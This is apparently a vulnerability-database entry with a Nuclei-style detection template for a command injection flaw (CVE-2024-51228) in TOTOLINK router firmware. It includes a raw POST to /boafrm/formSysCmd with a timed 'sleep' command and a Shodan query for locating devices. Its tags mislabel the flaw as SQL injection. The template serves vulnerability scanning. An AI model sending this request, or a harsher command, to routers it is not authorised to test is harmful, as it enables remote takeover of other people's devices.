An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.
PoC代码[已公开]
id: CVE-2024-51228
info:
name: TOTOLINK CX-A3002RU - Remote Code Execution
author: DhiyaneshDK
severity: medium
description: |
An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.
reference:
- https://github.com/yckuo-sdc/totolink-boa-api-vulnerabilities
- https://totolink.tw/support_view/A3002RU
- https://totolink.tw/support_view/N150RT
- https://www.totolink.tw/products_view/N300RT
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 6.8
cve-id: CVE-2024-51228
cwe-id: CWE-78
epss-score: 0.61706
epss-percentile: 0.98239
metadata:
max-request: 1
shodan-query: html:"TOTOLINK"
tags: cve,cve2024,totolink,time-based-sqli,sqli,vuln,vkev
http:
- raw:
- |
POST /boafrm/formSysCmd HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sysCmd=sleep%206
matchers:
- type: dsl
dsl:
- "duration>=6"
- 'contains(server,"Boa/0.94")'
- "status_code == 302"
condition: and
# digest: 490a0046304402206f2fa419b3b188478fd438ccdaf4b9e5723ac48e1337356e61da563ef475b9e5022056443f332b3878c1b8c7413e8ab54cce12c4ea0a2c6a7802bfce8dbcde998a57:922c64590222798bb761d5b6d8e72950